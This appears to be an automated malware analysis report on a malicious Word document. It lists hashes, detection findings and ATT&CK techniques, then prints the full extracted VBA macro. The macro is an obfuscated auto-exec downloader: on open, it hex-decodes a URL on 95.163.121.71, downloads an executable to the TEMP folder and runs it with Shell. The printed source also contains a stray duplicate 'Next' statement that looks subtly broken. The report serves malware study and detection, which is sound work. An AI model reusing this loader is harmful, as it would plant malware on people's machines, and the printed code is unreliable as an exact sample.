Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27d465eb58e46936…

MALICIOUS

Office (OLE)

Size: 39.5 KB
Created: 2014-11-24 10:39:00
Authoring application: Microsoft Office Word
First seen: 2015-02-05
MD5: 7f3c2b0c5abe311f4e40b2a938a8ed75
SHA-1: de424630248406ab3380dc6af0e1307b3ede5396
SHA-256: 27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d
Risk score: 406

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1204.002 Malicious File (User Execution)
T1059 Command and Scripting Interpreter
T1059.005 Visual Basic

The sample is a Word document whose VBA project is an obfuscated downloader. Two auto-exec entry points, AutoOpen() and Workbook_Open(), both call werwehytef(), which calls sdfsdwee(); every procedure is padded with nested For/DoEvents loops that do nothing except bloat the module and dilute keyword-density heuristics. The strings that matter are hex-encoded and rebuilt at run time by BUHVugrue(), which walks its argument two characters at a time, prefixes each pair with "&H", converts it with CDbl() and appends Chr() of the result. Decoding the literals in the extracted source gives the download URL http://95.163.121.71:8080/mopsi/popsi.php and the drop path %TEMP%\UGvdffg.exe (Environ("TEMP") joined to the decoded file name). sdfsdwee() passes those two strings to URLDownloadToFile() from urlmon.dll and then launches the dropped file with Shell(path, 1) (vbNormalFocus). The API declaration has a #If VBA7 branch with PtrSafe/LongPtr, so it binds on both 32-bit and 64-bit Office. The sample was first seen in 2015-02; treat the hosting IP as a historical indicator rather than live infrastructure.

Heuristics (12)

  • ClamAV: Doc.Downloader.Macr-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macr-2
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        pHUdsfd = Shell(oGYUIgiu, 1)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. In this sample the decoder is the repeated hex-string variant (BUHVugrue()) and it hides only the URL and the drop path; the URLDownloadToFile declaration and the Shell call stay visible in source, which is why the API- and string-level findings above fire as well.
    Matched line in script
        pHUdsfd = Shell(oGYUIgiu, 1)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents (e.g. stomped source streams) where visible source is unavailable. Here the source stream was recovered, so this finding corroborates the source-level findings from the compiled stream rather than standing alone.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
    Workbook_Open is an Excel event and fires only from an Excel ThisWorkbook module; inside this Word document's ThisDocument module it is dead code, most likely left by a macro generator that emits entry points for both applications. Execution in Word depends on AutoOpen() alone.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule is written for documents where no modern VBA project was recovered and no stronger macro-virus family marker was present; in this sample a VBA project was recovered (see the extracted macros.bas) and the marker is simply the AutoOpen procedure name, so the finding adds no independent evidence. On its own it is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6836 bytes
SHA-256: 0989b5737d60c5362a09c1c9ecccb1db3dfcbe74de792447a7d11306abebb666
Detection
ClamAV: No threats found
Obfuscation or payload: likely
65 of 115 identifiers look randomly generated (e.g. 'UJeTKZjRRErSpBP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As LongPtr, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As LongPtr) As LongPtr
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As Long, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As Long) As Long
#End If


Sub werwehytef()
Dim QOBXhmAl As Integer
For QOBXhmAl = 0 To 3
Dim kXJALATO As Integer
For kXJALATO = 0 To 5
Dim DwptkYLg As Integer
For DwptkYLg = 0 To 9
DoEvents
Next DwptkYLg
DoEvents
Next kXJALATO
Dim tlwoFgep As Integer
For tlwoFgep = 0 To 3
DoEvents
Next tlwoFgep
DoEvents
Next QOBXhmAl
Dim vtRZaliF As Integer
For vtRZaliF = 0 To 6
Dim pHKvosSI As Integer
For pHKvosSI = 0 To 4
DoEvents
Next pHKvosSI
DoEvents
Next vtRZaliF
Dim flWdzivJ As Integer
For flWdzivJ = 0 To 7
DoEvents
Next flWdzivJ
sdfsdwee
End Sub
Sub AutoOpen()
Dim VpUsliln As Integer
For VpUsliln = 0 To 2
Dim SAYlUiXp As Integer
For SAYlUiXp = 0 To 6
Dim XlKwlndr As Integer
For XlKwlndr = 0 To 5
DoEvents
Next XlKwlndr
DoEvents
Next SAYlUiXp
Dim NWWpsxNd As Integer
For NWWpsxNd = 0 To 8
DoEvents
Next NWWpsxNd
DoEvents
Next VpUsliln
Dim HrOinrOl As Integer
For HrOinrOl = 0 To 6
Dim MRKwlEzM As Integer
For MRKwlEzM = 0 To 7
DoEvents
Next MRKwlEzM
DoEvents
Next HrOinrOl
Dim VuWpsbFr As Integer
For VuWpsbFr = 0 To 8
DoEvents
Next VuWpsbFr
    werwehytef
End Sub
Sub Workbook_Open()
Dim fkNGSJaZ As Integer
For fkNGSJaZ = 0 To 1
Dim vofHhwnj As Integer
For vofHhwnj = 0 To 6
Dim WZzOiENz As Integer
For WZzOiENz = 0 To 1
DoEvents
Next WZzOiENz
DoEvents
Next vofHhwnj
Dim UedLuKbT As Integer
For UedLuKbT = 0 To 8
DoEvents
Next UedLuKbT
DoEvents
Next fkNGSJaZ
Dim vrUjKxcT As Integer
For vrUjKxcT = 0 To 6
Dim fkaGOdrn As Integer
For fkaGOdrn = 0 To 5
DoEvents
Next fkaGOdrn
DoEvents
Next vrUjKxcT
Dim itRnfloL As Integer
For itRnfloL = 0 To 3
DoEvents
Next itRnfloL
    werwehytef
End Sub
Sub sdfsdwee()
Dim nKOyHRKO As Integer
For nKOyHRKO = 0 To 7
Dim fjaGYIub As Integer
For fjaGYIub = 0 To 1
Dim DcXpaUZB As Integer
For DcXpaUZB = 0 To 3
DoEvents
Next DcXpaUZB
DoEvents
Next fjaGYIub
Dim nVumNXzZ As Integer
For nVumNXzZ = 0 To 1
DoEvents
Next nVumNXzZ
DoEvents
Next nKOyHRKO
Dim kLrEvRLI As Integer
For kLrEvRLI = 0 To 2
Dim KJSNNToS As Integer
For KJSNNToS = 0 To 7
DoEvents
Next KJSNNToS
DoEvents
Next kLrEvRLI
Dim SRhPEQft As Integer
For SRhPEQft = 0 To 5
DoEvents
Next SRhPEQft
Next SRhPEQft
HBBJK = BUHVugrue("6874")
hkhnioki = BUHVugrue("74703A2F2F")
hojdsfg = BUHVugrue("39352E3136332E3132312E37313A383038302F6D6F7073692F706F7073692E706870")
    uyVUHjdg = HBBJK + hkhnioki + hojdsfg
Dim lGxtiFPa As Integer
For lGxtiFPa = 0 To 2
Dim eEwdmMHl As Integer
For eEwdmMHl = 0 To 5
Dim QYosYDRG As Integer
For QYosYDRG = 0 To 2
DoEvents
Next QYosYDRG
DoEvents
Next eEwdmMHl
Dim vulxTzrl As Integer
For vulxTzrl = 0 To 9
DoEvents
Next vulxTzrl
DoEvents
Next lGxtiFPa
Dim uyvadHZZ As Integer
For uyvadHZZ = 0 To 6
Dim MYIgMYac As Integer
For MYIgMYac = 0 To 1
DoEvents
Next MYIgMYac
DoEvents
Next uyvadHZZ
Dim lSPogoeg As Integer
For lSPogoeg = 0 To 6
DoEvents
Next lSPogoeg
    oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
Dim AFzUlTGV As Integer
For AFzUlTGV = 0 To 9
Dim ysVaDJCV As Integer
For ysVaDJCV = 0 To 7
Dim lFAFtXdl As Integer
For lFAFtXdl = 0 To 2
DoEvents
Next lFAFtXdl
DoEvents
Next ysVaDJCV
Dim UtrTsIYm As Integer
For UtrTsIYm = 0 To 5
DoEvents
Next UtrTsIYm
DoEvents
Next AFzUlTGV
Dim NBASjVzj As Integer
For NBASjVzj = 0 To 8
Dim eRlvndEb As Integer
For eRlvndEb = 0 To 6
DoEvents
Next eRlvndEb
DoEvents
Next NBASjVzj
Dim kWWhUBVb As Integer
For kWWhUBVb = 0 To 9
DoEvents
Next kWWhUBVb
    eUUsdgf = URLDownloadToFile(0&, uyVUHjdg, oGYUIgiu, 0&, 0&)
   Dim pHUdsfd
Dim mAYkCQMj As Integer
For mAYkCQMj = 0 To 8
Dim TfgSUebU As Integer
For TfgSUebU = 0 To 4
Dim lIaKjaFk As Integer
For lIaKjaFk = 0 To 2
DoEvents
Next lIaKjaFk
DoEvents
Next TfgSUebU
Dim IBADqvaD As Integer
For IBADqvaD = 0 To 5
DoEvents
Next IBADqvaD
DoEvents
Next mAYkCQMj
Dim lFbXYkVq As Integer
For lFbXYkVq = 0 To 2
Dim bzGSzOfn As Integer
For bzGSzOfn = 0 To 3
DoEvents
Next bzGSzOfn
DoEvents
Next lFbXYkVq
Dim zFnLDitd As Integer
For zFnLDitd = 0 To 6
DoEvents
Next zFnLDitd
    pHUdsfd = Shell(oGYUIgiu, 1)

End Sub


Public Function BUHVugrue(ByVal UJeTKZjRRErSpBP As String) As String
For GAqVffe = 1 To Len(UJeTKZjRRErSpBP) Step 2
Dim GCYINvKW As Integer
For GCYINvKW = 0 To 9
Dim GBcmygBP As Integer
For GBcmygBP = 0 To 4
Dim VBWAuLfD As Integer
For VBWAuLfD = 0 To 7
DoEvents
Next VBWAuLfD
DoEvents
Next GBcmygBP
Dim hXiYEAvI As Integer
For hXiYEAvI = 0 To 2
DoEvents
Next hXiYEAvI
DoEvents
Next GCYINvKW
Dim XupwfuAF As Integer
For XupwfuAF = 0 To 5
Dim nUCwEhDX As Integer
For nUCwEhDX = 0 To 3
DoEvents
Next nUCwEhDX
DoEvents
Next XupwfuAF
Dim RpNpxsby As Integer
For RpNpxsby = 0 To 4
DoEvents
Next RpNpxsby
OAEeSPJcZw = Chr(CDbl(Chr(38) & Chr(72) & Mid$(UJeTKZjRRErSpBP, GAqVffe, 2)))
Dim DuDiCbga As Integer
For DuDiCbga = 0 To 6
Dim KYaocdyh As Integer
For KYaocdyh = 0 To 1
Dim WdSgkWrx As Integer
For WdSgkWrx = 0 To 1
DoEvents
Next WdSgkWrx
DoEvents
Next KYaocdyh
Dim OSNdzeBF As Integer
For OSNdzeBF = 0 To 8
DoEvents
Next OSNdzeBF
DoEvents
Next DuDiCbga
Dim pRddMWhq As Integer
For pRddMWhq = 0 To 2
Dim MxHzzJfz As Integer
For MxHzzJfz = 0 To 1
DoEvents
Next MxHzzJfz
DoEvents
Next pRddMWhq
Dim UVNdayDT As Integer
For UVNdayDT = 0 To 1
DoEvents
Next UVNdayDT
qwsEHVrtCMHkAS = qwsEHVrtCMHkAS & OAEeSPJcZw
Next GAqVffe
Dim JOHXGwzq As Integer
For JOHXGwzq = 0 To 6
Dim iMLSjCiD As Integer
For iMLSjCiD = 0 To 6
Dim ToNdaoAx As Integer
For ToNdaoAx = 0 To 8
DoEvents
Next ToNdaoAx
DoEvents
Next iMLSjCiD
Dim vCRVRgYG As Integer
For vCRVRgYG = 0 To 6
DoEvents
Next vCRVRgYG
DoEvents
Next JOHXGwzq
Dim iGddLVrz As Integer
For iGddLVrz = 0 To 6
Dim tqkMiOqQ As Integer
For tqkMiOqQ = 0 To 3
DoEvents
Next tqkMiOqQ
DoEvents
Next iGddLVrz
Dim JQZruVPf As Integer
For JQZruVPf = 0 To 1
DoEvents
Next JQZruVPf
BUHVugrue = qwsEHVrtCMHkAS
End Function